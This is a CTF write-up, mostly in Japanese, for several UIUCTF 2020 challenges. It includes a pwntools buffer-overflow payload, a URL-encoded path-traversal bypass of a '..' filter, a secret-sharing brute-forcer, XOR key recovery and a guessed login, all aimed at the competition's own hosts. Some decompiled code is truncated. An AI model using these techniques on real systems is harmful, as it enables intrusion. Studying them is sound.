UIUCTF 2020 Writeup

この大会は2020/7/18 10:00(JST)~2020/7/20 10:00(JST)に開催されました。

Spoockies (Warmup 20)

$ file pwn-warmup 
pwn-warmup: ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=31aaa64fbf0494f6958d5a8ec60dd3147afda5d5, not stripped


undefined4 main(void)

  undefined *puVar1;
  puVar1 = &stack0x00000004;
  setvbuf(stdin,(char *)0x0,2,0);
  setvbuf(stdout,(char *)0x0,2,0);
  puts("This is UIUCTF PWN Warmup, what could possibly be happening under here hmm...");
  return 0;

void vulnerable(void)

  char local_24 [16];
  int local_14;
  int local_10;
  local_10 = 0x12345678;
  local_14 = 0x12345678;
  if ((local_10 != 0x12345678) && (local_14 == 0x12345678)) {

void give_flag(void)

  FILE *__stream;
  int iVar1;
  __stream = fopen("flag.txt","r");
  if (__stream == (FILE *)0x0) {
    puts("Couldn\'t open flag file!");
  else {
    while( true ) {
      iVar1 = fgetc(__stream);
      if ((char)iVar1 == -1) break;


from pwn import *

p = remote('chal.uiuc.tf', 2003)
#p = process('./pwn-warmup')

data = p.recvline().rstrip()
print data
payload = 'a' * 16 + p32(0x12345678) + p32(0x12345677)
print payload
data = p.recv()
print data


[+] Opening connection to chal.uiuc.tf on port 2003: Done
This is UIUCTF PWN Warmup, what could possibly be happening under here hmm...
[*] Closed connection to chal.uiuc.tf port 2003

Tom Nook Has Stonks (Warmup 20)


・guess: 数値入力
・guess: guessの16進数の後半4バイト+前半4バイト
・guess: 10進数に変換
 guess = int((str(hex(guess)[2:])[::-1]),16) - tax4 * 1000
  guess -= tax5 * tax4
・guess: 16進数に変換
・guess: 2バイトごとに数値にした配列
・guess[1] /= 2
・guess[0] *= 3
・guess[1] -= 18
・guess[3] -= 30
・guess[0] += int((ord('j') - ord('J')) / (ord('E') - ord('e')))
・guess[2] += ord('b')
・guess[0] += int((ord('g') - ord('G')) / (ord('z') - ord('Z')) * ord('c') - ord('a'))
・guess = 各要素の16進数配列を逆順
・guess[3] = hex(int(guess[3],16) + 32)
・final = guessの各要素を10進数にして、ASCIIとして文字にする。


final = 'Lmao'

guess = [ord(c) for c in final]
guess[3] -= 32
guess = guess[::-1]
guess[0] -= int((ord('g') - ord('G')) / (ord('z') - ord('Z')) * ord('c') - ord('a'))
guess[2] -= ord('b')
guess[0] -= int((ord('j') - ord('J')) / (ord('E') - ord('e')))
guess[3] += 30
guess[1] += 18
guess[0] /= 3
guess[1] *= 2
guess = [hex(g)[2:].zfill(2) for g in guess]
guess = int(''.join(guess), 16)
for tax5 in range(0,1000,5):
    for tax4 in range(10,40,10):
        guess += tax5 * tax4
for tax4 in range(28, 16, -2):
    guess = guess + tax4 * 1000
    guess = int(hex(guess)[2:].rstrip('L')[::-1], 16)
guess = hex(guess)[2:]
guess = str(guess[4:8]) + str(guess[0:4])
guess = int(guess, 16)
for tax3 in range(0, 1234):
    guess += 1337 + tax3

flag = 'uiuctf{%d}' % guess
print flag

K.K's Mixtape (Warmup 20)



Kernel::Time_To_Start (Kernel Exploitation 100)

VNC接続し、ログインする問題。usernameはsandb0xで、passwordは4文字で、すべてアルファベット小文字、pから始まる。passwordは推測して、sandb0x / pwnyでログインしてみたらログインできて、フラグが書いてあった。


security_question (Web 100)


def get_poem():
    poemname = request.args.get('name')

    if not poemname:
        return 'Please send a name query:\n' + str(os.listdir('poems')), 404

    poemdir     = os.path.join(os.getcwd(), 'poems')
    poempath    = os.path.join(poemdir, poemname) 

    if '..' in poemname:
        return 'Illegal substring detected.', 403
    if not os.path.exists(poempath):
        return 'File not found.', 404

    return send_file(poempath)
$ curl https://security.chal.uiuc.tf/getpoem
Please send a name query:
['rise.txt', 'daddy.txt', 'tyger.txt', 'road.txt']


$ curl https://security.chal.uiuc.tf/getpoem?name=%2fhidden_poem.txt

Raymonds Recovery (Forensics 100)

FTK Imagerで開くと、[root]直下にファイルがたくさんあることがわかるので、エクスポートする。JPGファイルとかがヘッダがない状態になっている。
とりあえず、何のファイルのヘッダがないものなのかをバイナリエディタで見る。JPG, PDF, PNGの場合があるので、修復する。

import os

INPUT_DIR = 'files/'
OUTPUT_DIR = 'output/'

files = os.listdir(INPUT_DIR)
for file in files:
    with open(INPUT_DIR + file, 'rb') as f:
        data = f.read().rstrip('\x00')
    if data.endswith('EOF\x0a'):
        data = '%PDF' + data
        with open(OUTPUT_DIR + file + '.pdf', 'wb') as f:
    elif data.endswith('EOF\x0d\x0a'):
        data = '%PDF' + data
        with open(OUTPUT_DIR + file + '.pdf', 'wb') as f:
    elif data.endswith('\xff\xd9'):
        if not data.startswith('\xff\xd8\xff'):
            data = '\xff\xd8\xff' + data
            with open(OUTPUT_DIR + file + '.jpg', 'wb') as f:
            with open(OUTPUT_DIR + file + '.jpg', 'wb') as f:
    elif data.endswith('IEND\xae\x42\x60\x82'):
        data = '\x89PNG\x0d\x0a\x1a\x0a' + data
        with open(OUTPUT_DIR + file + '.png', 'wb') as f:



isabelles_file_encryption (Crypto 100)




def decrypt(ciphertext, password):
    remove_spice = lambda b: 0xff & ((b >> 1) | (b << 7))
    plaintext = ''
    for i in range(len(ciphertext)):
        code = ord(ciphertext[i]) ^ ord(password[i%len(password)])
        code = remove_spice(code)
        plaintext += chr(code)
    return plaintext

def get_password(plaintext, ciphertext, index):
    add_spice = lambda b: 0xff & ((b << 1) | (b >> 7))
    password = ''
    for i in range(8):
        code = add_spice(ord(plaintext[i])) ^ ord(ciphertext[i])
        password += chr(code)
    password = password[8 - index % 8:] + password[:8 - index % 8]
    return password

with open('blackmail_encrypted', 'rb') as f:
    ct = f.read()

crib = 'Isabelle'

for i in range(len(ct) - len(crib) + 1):
    password = get_password(crib, ct[i:i+8], i)
    pt = decrypt(ct, password)
    if 'uiuctf' in pt:
        print '[+] index =', i
        print '[+] password =', password
        print pt


[+] index = 26013
[+] password = iSaBelLE


You docile, old raccoon. I have finally found the secret sauce behind your nefarious shop.

For far too long I, Isabelle, have suffered under your horrendous prices. Your reign of terror comes to an end.

For you see, as the town's loyal assistant, I have direct access to all your financials.

I have found evidence that you have been siphoning bells from the citizens.

As you can see, the start of this file is picture proof in the form of half a JPEG in bytes.

I, Isabelle, put the other half at the end.

It's totally not to try to trick online repeated XOR solvers. I, Isabelle, am very smart!

Anyways, I'm gonna need you to give me a lot of those bells or I report you to the Mayor.

You can take this flag as a sign I'm being serious: uiuctf{winner_winner_raccoon_dinner}



coelacanth_vault (Crypto 300)

$ nc chal.uiuc.tf 2004
Hi, and welcome to the virtual Animal Crossing: New Horizon coelacanth vault!
There are 5 different cryptolocks that must be unlocked in order to open the vault.
You get one portion of each code for each coelacanth you have caught, and will need to use them to reconstruct the key for each lock.
Unfortunately, it appears you have not caught enough coelacanths, and thus will need to find another way into the vault.
Be warned, these locks have protection against brute force; too many wrong attempts and you will have to start over!

How many coelacanth have you caught? 9
Generating key for lock 0, please wait...
Here are your key portions:
[(152, 197), (72, 163), (57, 179), (129, 157), (28, 173), (99, 199), (226, 251), (117, 223), (152, 227)]
Please input the key: 


num_shares: 9以下の数値を指定

・secret, shares = create_key(THRESHOLD=10, TOTAL=15)
 ・seq: 15個の8ビット素数の配列(ソート)
 ・alpha: seqの先頭10個の積
 ・beta: seqの末尾9個の積
  ・secret: beta~alphaランダム整数
  ・shares: secret % numとnumのペアの配列
・r_secret = construct_key(random.sample(shares, THRESHOLD=10))
・secret == r_secretのチェック

 ・n_secret: 数値入力


import socket

def recvuntil(s, tail):
    data = ''
    while True:
        if tail in data:
            return data
        data += s.recv(1)


prod = lambda n: reduce(lambda x, y: x*y, n)

def construct_key(shares):
    glue = lambda A, n, s=1, t=0, N=0: (n < 2 and t % N or glue(n, A % n, t, s - A//n * t, N or n), -1)[n < 1]
    mod = prod([m for s, m in shares])
    secret = sum([s * glue(mod//m, m) * mod//m for s, m in shares]) % mod
    return secret

primes = [131, 137, 139, 149, 151, 157, 163, 167, 173, 179, 181, 191, 193,
    197, 199, 211, 223, 227, 229, 233, 239, 241, 251]

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('chal.uiuc.tf', 2004))

data = recvuntil(s, '? ')
print data + '9'

for lock_num in range(NUM_LOCKS):
    data = recvuntil(s, ':\n').rstrip()
    print data
    data = recvuntil(s, '\n').rstrip()
    print data
    shares = eval(data)
    share_primes = [share[1] for share in shares]
    for p in primes:
        if p not in share_primes:
            plus_prime = p
    for num_attempts in range(NUM_TRIES):
        plus_share = [(num_attempts, plus_prime)]
        secret = construct_key(shares + plus_share)

        data = recvuntil(s, ': ')
        print data + str(secret)
        s.sendall(str(secret) + '\n')

        data = recvuntil(s, '\n').rstrip()
        print data
        if data.startswith('Lock'):

data = recvuntil(s, '\n').rstrip()
print data
data = recvuntil(s, '\n').rstrip()
print data


Hi, and welcome to the virtual Animal Crossing: New Horizon coelacanth vault!
There are 5 different cryptolocks that must be unlocked in order to open the vault.
You get one portion of each code for each coelacanth you have caught, and will need to use them to reconstruct the key for each lock.
Unfortunately, it appears you have not caught enough coelacanths, and thus will need to find another way into the vault.
Be warned, these locks have protection against brute force; too many wrong attempts and you will have to start over!

How many coelacanth have you caught? 9
Generating key for lock 0, please wait...
Here are your key portions:
[(12, 199), (47, 149), (139, 197), (47, 173), (162, 211), (168, 179), (127, 239), (7, 137), (36, 227)]
Please input the key: 9363193076599820223704
Key incorrect. You have 250 tries remaining for this lock.
Please input the key: 21845192614703784394380
Key incorrect. You have 249 tries remaining for this lock.
Please input the key: 34327192152807748565056
Key incorrect. You have 248 tries remaining for this lock.
Please input the key: 3122193307547838138366
Lock 0 unlocked with 65 failed attempts!
Generating key for lock 1, please wait...
Here are your key portions:
[(95, 157), (58, 191), (209, 233), (14, 149), (55, 223), (214, 229), (113, 139), (149, 197), (242, 257)]
Please input the key: 7951128200770174371308
Key incorrect. You have 250 tries remaining for this lock.
Please input the key: 2339085545640217169063
Lock 1 unlocked with 16 failed attempts!
Generating key for lock 2, please wait...
Here are your key portions:
[(237, 251), (35, 211), (143, 229), (18, 173), (44, 193), (3, 191), (2, 151), (66, 227), (62, 181)]
Please input the key: 38462509491395574583335
Key incorrect. You have 250 tries remaining for this lock.
Please input the key: 15429480447093626001879
Lock 2 unlocked with 4 failed attempts!
Generating key for lock 3, please wait...
Here are your key portions:
[(161, 173), (81, 157), (130, 227), (185, 239), (21, 137), (91, 257), (70, 193), (26, 179), (57, 151)]
Please input the key: 16223079724549923683921
Key incorrect. You have 250 tries remaining for this lock.
Please input the key: 4043760736124353106516
Lock 3 unlocked with 38 failed attempts!
Generating key for lock 4, please wait...
Here are your key portions:
[(213, 223), (110, 229), (40, 257), (7, 233), (105, 131), (18, 211), (142, 149), (148, 191), (234, 241)]
Please input the key: 9323223743359497746050
Key incorrect. You have 250 tries remaining for this lock.
Please input the key: 4105725297510172042753
Lock 4 unlocked with 131 failed attempts!
Opening vault...
Looks like the vault has already been emptied :( however, you can have this flag instead: uiuctf{small_oysters_expire_quick}

Feedback Survey (Misc 20)

